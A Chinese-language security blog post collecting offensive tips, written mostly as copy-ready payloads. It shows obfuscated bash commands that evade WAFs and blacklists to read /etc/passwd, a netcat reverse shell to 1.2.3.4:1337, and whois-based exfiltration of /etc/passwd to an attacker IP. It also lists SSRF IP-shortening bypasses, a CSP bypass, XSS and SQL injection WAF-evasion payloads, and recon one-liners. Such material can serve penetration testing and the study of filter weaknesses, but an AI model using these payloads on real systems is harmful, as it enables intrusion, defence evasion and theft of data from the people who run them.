Ethan's Blog

Some fun tips

字数统计: 631阅读时长: 3 min
2020/04/22 Share

题记

本系列是持续更新,主要是记录一些,比较小的tip,因为知识点碎,所以做成一个集合,想起来就写写!

命令执行tips

bypass blacklisted words filter (or firewalls)

1
2
3
4
5
6
7
/b'i'n/c'a't /e't'c/p'a's's'w'd' 

/???/?at /???/????w?

/usr/b'i'n/'n'c 2130706433 80

/???/???/n? 2130706433 80

用echo的cat命令执行

原理就是借用echo重定向,来输出字符,使用反引号进行命令执行

1
cat `echo -n '/etc'|| echo '/shit'&& echo '/passwd'`

使用未初始化的Bash变量绕过基于WAF

其中$ U不存在,它会被视为由bash的一个空字符串

1
cat$u /etc$u/passwd$u

1
nc$u -e /bin$u/bash$u 1.2.3.4 1337

不带空格的命令执行

1
2
3
4
5
6
IFS=,;`cat<<<cat,/etc/passwd`
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}
X=$'cat\x20/etc/passwd'&&$X

黑名单绕过

IP地址黑名单

通过去掉0来绕过SSRF或者重定向的黑名单

例子:

1
2
3
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
http://127.0.0.1 -> http://127.1

使用./绕过文件限制

特殊编码字符

CSP Bypass

如果CSP策略指向dir并且你使用%2f来编码/,则仍然认为它位于目录内

%2f..%2f

XSS WAF Bypass

1
on<>mouseover="ale<>rt()">

<svg/OnLoad="${prompt}">

XSS cheat sheet

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

资产搜集

Bash简洁式

1
curl -sL http://index.commoncrawl.org | grep 'href="/CC'  |  awk -F'"' '{print $2}' | xargs -n1 -I{} curl -sL http://index.commoncrawl.org{}-index?url=http://uber.com* |  awk -F'"url":\ "' '{print $2}' | cut -d'"' -f1 | sort -u | tee domain.txt

好用的dork

1
2
3
4
site:*.site.com -www 
site:*.*.site.com -www
site:*.*.*.site.com -www
inurl:"http://att.com:8080"

重定向Bypass

SQL injection bypass waf

看到了很有趣的SQL注入绕过waf的tricks,所以记录下来。

1
2
3
4
5
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`

更多例子:

不错参考资料

https://websec.ca/kb/sql_injection#MySQL_Fuzzing_Obfuscation

链接:https://pan.baidu.com/s/1E5NCGWtACdsy3YcCzznAcQ
提取码:jlo2

SQLi Authentication Bypass

Fun discuss

whois for data

有时候有趣的探讨很有意思,看到一个关于数据窃取的方式讨论,具体是使用whois

1
2
攻击者: nc -l -v -p 53 | sed "s/ //g" | base64 -d
受害人: whois -h $attackerIP -p 53 cat /etc/passwd | base64

有人提出了其它用法,可以用于文件上传

工具

一款极好的fuzz工具

推荐一款fuzz速度极快的工具,使用go语言开发的ffuf

ffuf -w "subdomains.txt:DOMAIN" -w /opt/dirsearch/db/dicc.txt -u https://DOMAIN/FUZZ -t 400

github:https://github.com/ffuf/ffuf

CATALOG
  1. 1. 题记
  2. 2. 命令执行tips
    1. 2.1. bypass blacklisted words filter (or firewalls)
    2. 2.2. 用echo的cat命令执行
    3. 2.3. 使用未初始化的Bash变量绕过基于WAF
    4. 2.4. 不带空格的命令执行
  3. 3. 黑名单绕过
    1. 3.1. IP地址黑名单
    2. 3.2. 使用./绕过文件限制
    3. 3.3. 特殊编码字符
    4. 3.4. CSP Bypass
  4. 4. XSS WAF Bypass
  5. 5. 资产搜集
    1. 5.1. Bash简洁式
    2. 5.2. 好用的dork
  6. 6. 重定向Bypass
  7. 7. SQL injection bypass waf
    1. 7.1. SQLi Authentication Bypass
  8. 8. Fun discuss
    1. 8.1. whois for data
  9. 9. 工具
    1. 9.1. 一款极好的fuzz工具